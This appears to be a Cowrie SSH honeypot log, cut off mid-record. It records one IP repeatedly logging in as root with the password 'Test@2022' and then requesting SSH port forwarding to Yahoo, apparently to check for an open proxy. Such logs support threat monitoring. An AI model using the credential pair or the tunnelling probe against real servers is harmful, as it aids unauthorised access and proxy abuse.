{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46303,"dst_ip":"1.2.3.4","dst_port":22,"session":"da9fadce2062","protocol":"ssh","message":"New connection: 213.209.150.239:46303 (1.2.3.4:22) [session: da9fadce2062]","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.561168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.561871Z","src_ip":"213.209.150.239","session":"da9fadce2062"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.618792Z","src_ip":"213.209.150.239","session":"da9fadce2062"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.901076Z","src_ip":"213.209.150.239","session":"da9fadce2062"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":13439,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13439","sensor":"my-vps","timestamp":"2025-08-26T01:07:14.958611Z","session":"da9fadce2062"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.015481Z","src_ip":"213.209.150.239","session":"da9fadce2062"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18474,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18474","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.170970Z","session":"da9fadce2062"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.227661Z","src_ip":"213.209.150.239","session":"da9fadce2062"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.285261Z","src_ip":"213.209.150.239","session":"da9fadce2062"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46351,"dst_ip":"1.2.3.4","dst_port":22,"session":"796c25d4f4e5","protocol":"ssh","message":"New connection: 213.209.150.239:46351 (1.2.3.4:22) [session: 796c25d4f4e5]","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.340973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.351218Z","src_ip":"213.209.150.239","session":"796c25d4f4e5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.397992Z","src_ip":"213.209.150.239","session":"796c25d4f4e5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.680889Z","src_ip":"213.209.150.239","session":"796c25d4f4e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":24492,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24492","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.739073Z","session":"796c25d4f4e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.795933Z","src_ip":"213.209.150.239","session":"796c25d4f4e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":25160,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25160","sensor":"my-vps","timestamp":"2025-08-26T01:07:15.951225Z","session":"796c25d4f4e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.008023Z","src_ip":"213.209.150.239","session":"796c25d4f4e5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.065574Z","src_ip":"213.209.150.239","session":"796c25d4f4e5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46416,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5405d8136aa","protocol":"ssh","message":"New connection: 213.209.150.239:46416 (1.2.3.4:22) [session: f5405d8136aa]","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.121158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.121805Z","src_ip":"213.209.150.239","session":"f5405d8136aa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.178531Z","src_ip":"213.209.150.239","session":"f5405d8136aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.474817Z","src_ip":"213.209.150.239","session":"f5405d8136aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22918,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22918","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.532322Z","session":"f5405d8136aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.588879Z","src_ip":"213.209.150.239","session":"f5405d8136aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":25860,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:25860","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.743016Z","session":"f5405d8136aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.799700Z","src_ip":"213.209.150.239","session":"f5405d8136aa"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.857041Z","src_ip":"213.209.150.239","session":"f5405d8136aa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46484,"dst_ip":"1.2.3.4","dst_port":22,"session":"db4b223fe3bf","protocol":"ssh","message":"New connection: 213.209.150.239:46484 (1.2.3.4:22) [session: db4b223fe3bf]","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.912957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.915683Z","src_ip":"213.209.150.239","session":"db4b223fe3bf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:16.972508Z","src_ip":"213.209.150.239","session":"db4b223fe3bf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.255662Z","src_ip":"213.209.150.239","session":"db4b223fe3bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22985,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22985","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.313459Z","session":"db4b223fe3bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.370419Z","src_ip":"213.209.150.239","session":"db4b223fe3bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":20762,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20762","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.527075Z","session":"db4b223fe3bf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.583769Z","src_ip":"213.209.150.239","session":"db4b223fe3bf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.642049Z","src_ip":"213.209.150.239","session":"db4b223fe3bf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46550,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d7ba87b4d90","protocol":"ssh","message":"New connection: 213.209.150.239:46550 (1.2.3.4:22) [session: 8d7ba87b4d90]","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.697891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.707146Z","src_ip":"213.209.150.239","session":"8d7ba87b4d90"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:17.754814Z","src_ip":"213.209.150.239","session":"8d7ba87b4d90"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.037688Z","src_ip":"213.209.150.239","session":"8d7ba87b4d90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":19245,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19245","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.095434Z","session":"8d7ba87b4d90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.152304Z","src_ip":"213.209.150.239","session":"8d7ba87b4d90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":27684,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27684","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.307136Z","session":"8d7ba87b4d90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.363860Z","src_ip":"213.209.150.239","session":"8d7ba87b4d90"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.421456Z","src_ip":"213.209.150.239","session":"8d7ba87b4d90"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46614,"dst_ip":"1.2.3.4","dst_port":22,"session":"0260bb0be141","protocol":"ssh","message":"New connection: 213.209.150.239:46614 (1.2.3.4:22) [session: 0260bb0be141]","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.477294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.478525Z","src_ip":"213.209.150.239","session":"0260bb0be141"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-c